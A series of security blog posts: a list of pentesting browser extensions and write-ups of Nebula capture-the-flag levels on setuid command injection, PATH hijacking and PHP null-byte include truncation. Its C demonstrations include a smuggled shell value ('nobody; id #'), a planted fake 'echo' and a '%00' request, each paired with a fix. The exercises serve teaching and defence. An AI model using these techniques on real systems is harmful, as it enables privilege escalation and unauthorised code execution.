There are a lot of browser extensions developed by the community; here are my favorites.

Firefox

All of the following extensions can be found in the HackerFox suite.

  • Calomel SSL Validation : rates the security of the SSL connection. The toolbar button changes color depending on the strength of the negotiated cipher suite.
  • Firebug : the best addon ever. Used by web developers to edit, debug and monitor CSS, HTML and JavaScript live in any web page.
  • HackBar : perfect for testing SQL injections. Easy to use, with options for encoding (Base64, URL, hex), hashing (MD5, SHA-256) and ROT13. You can also alter POST data and your Referer header.
  • HttpFox : displays information about each request: headers, cookies, POST data, timing and so on…
...

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? Files for this level can be found in /home/flag02.

#define _GNU_SOURCE   /* asprintf() is a GNU extension; without this the prototype is missing */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;
  
  gid_t gid;
  uid_t uid;
  
  gid = getegid();
  uid = geteuid();
  
  /* make the real and saved ids match the effective (setuid) ones */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  
  buffer = NULL;
  
  /* USER comes from the caller's environment and is pasted, unescaped, into a shell command line */
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
  return 0;
}

As in the previous level, we have a setuid executable owned by our target, flag02, which uses the USER environment variable to print a super cool message. The value is pasted straight into a command line that system() hands to /bin/sh -c, so whoever runs the binary controls part of the command the shell parses.
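To show the consequence and its fix side by side, here is an added C example (not from the level's own files): build_command() reproduces the level's asprintf() construction, has_shell_meta() flags a USER value that /bin/sh would parse as more than a word, and run_echo_safely() is the hardened form, which executes /bin/echo directly with a fixed environment so no shell ever sees the value. The USER value "nobody; id #" is constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Same construction as the level: the USER value is pasted into a command
 * line that system() passes to /bin/sh -c, so any character sh treats as
 * syntax (";", "$(...)", "`...`", "|", ...) is interpreted, not echoed. */
char *build_command(const char *user)
{
    char *buffer = NULL;
    if (asprintf(&buffer, "/bin/echo %s is cool", user) < 0)
        return NULL;
    return buffer;
}

/* Returns 1 if `s` contains a character /bin/sh would interpret, i.e. a
 * USER value that lets its owner append a command of their own. */
int has_shell_meta(const char *s)
{
    return strpbrk(s, ";|&$`()<>\n\\\"'*?") != NULL;
}

/* Hardened form: no shell at all.  /bin/echo is executed by absolute path
 * with the value as a single argv element, and the environment is replaced
 * by a fixed minimal one so the caller's PATH, IFS, etc. cannot influence
 * the child.  Returns the child's exit status, or -1 on error. */
int run_echo_safely(const char *user)
{
    char *argv[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);
        _exit(127);          /* only reached if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed attacker-controlled USER value, not taken from the page. */
    const char *evil = "nobody; id #";
    char *cmd = build_command(evil);
    printf("system() would receive: %s\n", cmd);
    printf("contains shell metacharacters: %d\n", has_shell_meta(evil));
    free(cmd);
    /* The same value through the hardened path is printed literally. */
    return run_echo_safely(evil);
}
```

With the constructed value, the shell receives `/bin/echo nobody; id # is cool`: it runs `/bin/echo nobody`, then `id`, and discards the rest as a comment. The hardened version prints the whole string, semicolon included, because /bin/echo receives it as one argument.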

...

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? Files for this level can be found in /home/flag01.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

This program has been compiled and the executable is available in /home/flag01.
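The lookup that matters here, as an added C example rather than anything from the level's own files: `/usr/bin/env echo` resolves `echo` through PATH, and a setuid program inherits PATH from whoever runs it. find_in_path() is a simplified reimplementation of the search env and execvp perform (first directory with an executable of that name wins), make_fake_echo_dir() constructs a temporary directory holding an `echo` script for the demonstration, and hardened_command() shows the fix: an absolute path, which is never looked up in PATH.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/* Walk a PATH value the way env/execvp do: the first directory containing
 * an executable named `prog` wins.  Writes the match into `out` and
 * returns 1, or returns 0 if no directory matches. */
int find_in_path(const char *prog, const char *path, char *out, size_t outlen)
{
    char *copy = strdup(path);
    if (!copy)
        return 0;
    int found = 0;
    char *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, outlen, "%s/%s", dir, prog);
        if (access(out, X_OK) == 0) {
            found = 1;
            break;
        }
    }
    free(copy);
    return found;
}

/* Constructed attacker setup: a directory the caller controls, holding an
 * executable called "echo".  Returns the directory path (caller frees with
 * remove_fake_echo_dir), or NULL on failure. */
char *make_fake_echo_dir(void)
{
    char tmpl[] = "/tmp/fakebin.XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (!dir)
        return NULL;
    char file[256];
    snprintf(file, sizeof file, "%s/echo", dir);
    int fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0755);
    if (fd < 0)
        return NULL;
    const char *script = "#!/bin/sh\necho fake echo running with uid $(id -u)\n";
    size_t n = strlen(script);
    if (write(fd, script, n) != (ssize_t)n) {
        close(fd);
        return NULL;
    }
    close(fd);
    return strdup(dir);
}

void remove_fake_echo_dir(char *dir)
{
    char file[256];
    snprintf(file, sizeof file, "%s/echo", dir);
    unlink(file);
    rmdir(dir);
    free(dir);
}

/* Hardened form: an absolute path is executed as-is, so PATH is irrelevant. */
const char *hardened_command(void)
{
    return "/bin/echo and now what?";
}

int main(void)
{
    char *dir = make_fake_echo_dir();
    if (!dir)
        return 1;
    char path[512], resolved[512];
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", dir);
    if (find_in_path("echo", path, resolved, sizeof resolved))
        printf("with PATH=%s, env would run: %s\n", path, resolved);
    /* The level's call, under the attacker's PATH: the fake echo runs. */
    setenv("PATH", path, 1);
    system("/usr/bin/env echo and now what?");
    printf("hardened: system(\"%s\")\n", hardened_command());
    remove_fake_echo_dir(dir);
    return 0;
}
```

Note that env is itself reached by absolute path in the level, so the lookup that can be hijacked is the one env performs for `echo`; the same applies to any relative program name handed to system() or execvp() from a setuid binary.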

...

Nebula is part of Exploit Exercises; it offers a variety of simple and intermediate challenges covering Linux privilege escalation, common scripting language issues, and file system race conditions.

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

In this first level, you have to find a file owned by flag00 with the setuid bit set. A single command does the trick (-perm /6000 matches files with either the setuid or the setgid bit; use -perm -4000 for setuid only, and append 2>/dev/null to hide errors from directories you cannot read):

find / -user flag00 -perm /6000
...

I recently read a nice article on InfoSec Institute (again) about null byte injection. However, I had some problems making it work in a real situation, so I decided to write my own.

First of all, this vulnerability was fixed in PHP 5.3.4, which rejects file paths containing a null byte (until someone finds another buggy function…), so you need to install an older version of PHP. Grab one from the PHP releases archive. After compiling and configuring it, it is essential to set magic_quotes_gpc=Off in php.ini: with magic quotes on, the null byte in the request is escaped to a backslash followed by a zero before your script runs, so the truncation never happens. This setting cannot be changed with ini_set from the script itself, because GET data is escaped before the script starts.

Then imagine an index.php like this:

<?php
include( '/var/www/pages/'.$_GET['p'].'.php' );
?>

And a /var/www/pages/store.php like this:

<?php
echo 'This is the store !';
?>

If you request store.php directly it works, but in practice index.php is used to wrap each page with common elements such as a header and footer.
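The reason the appended `.php` can be dropped lies one layer below PHP, and the following added C example (not the article's code) shows it: a PHP string is length-counted and may contain NUL bytes, but the libc calls made underneath include() take a NUL-terminated char* and stop at the first zero byte. build_include_path() performs the same concatenation as the vulnerable index.php on a counted buffer, path_seen_by_libc() is what open() receives, url_decode() is a minimal %XX decoder standing in for PHP's own, and path_is_valid() reimplements, for illustration, the kind of check PHP 5.3.4 introduced. The request value "store%00" is constructed for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Models the PHP side: a counted string that may contain '\0' bytes.
 * data is always followed by a terminating '\0' so it can be handed to
 * libc, which is exactly where the two views of the string diverge. */
typedef struct {
    unsigned char *data;
    size_t len;            /* length PHP believes the string has */
} php_string;

/* Minimal %XX decoder for a query-string value (illustrative, not PHP's
 * own).  Returns the decoded length; "%00" becomes a real NUL byte. */
size_t url_decode(const char *in, unsigned char *out)
{
    size_t n = 0;
    for (; *in; in++) {
        unsigned int byte;
        if (*in == '%' && sscanf(in + 1, "%2x", &byte) == 1) {
            out[n++] = (unsigned char)byte;
            in += 2;
        } else {
            out[n++] = (unsigned char)*in;
        }
    }
    out[n] = '\0';
    return n;
}

/* Same concatenation as the vulnerable index.php:
 * '/var/www/pages/' . $_GET['p'] . '.php', done on a counted buffer. */
php_string build_include_path(const unsigned char *p, size_t plen)
{
    static const char prefix[] = "/var/www/pages/";
    static const char suffix[] = ".php";
    php_string s;
    s.len = (sizeof prefix - 1) + plen + (sizeof suffix - 1);
    s.data = malloc(s.len + 1);
    memcpy(s.data, prefix, sizeof prefix - 1);
    memcpy(s.data + sizeof prefix - 1, p, plen);
    memcpy(s.data + sizeof prefix - 1 + plen, suffix, sizeof suffix); /* copies the '\0' too */
    return s;
}

/* The path the C layer actually opens: everything before the first NUL.
 * When p carried a %00, the ".php" PHP appended is silently dropped. */
const char *path_seen_by_libc(const php_string *s)
{
    return (const char *)s->data;
}

/* The kind of check PHP 5.3.4 introduced (reimplemented for illustration):
 * if the counted length and the C-string length disagree, the path has an
 * embedded NUL and must be rejected before it reaches the filesystem. */
int path_is_valid(const php_string *s)
{
    return memchr(s->data, '\0', s->len) == NULL;
}

int main(void)
{
    unsigned char p[64];
    /* Constructed request: index.php?p=store%00 */
    size_t plen = url_decode("store%00", p);
    php_string path = build_include_path(p, plen);
    printf("PHP built a %zu-byte path; libc opens \"%s\"\n",
           path.len, path_seen_by_libc(&path));
    printf("valid under the 5.3.4 check: %d\n", path_is_valid(&path));
    free(path.data);
    return 0;
}
```

For `p=store%00` PHP builds the 25-byte string `/var/www/pages/store\0.php`, while open() sees only `/var/www/pages/store`; combine that with `../` components in p and the prefix no longer confines the include either, which is why rejecting any path with an embedded NUL is the right fix rather than trying to escape it.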

...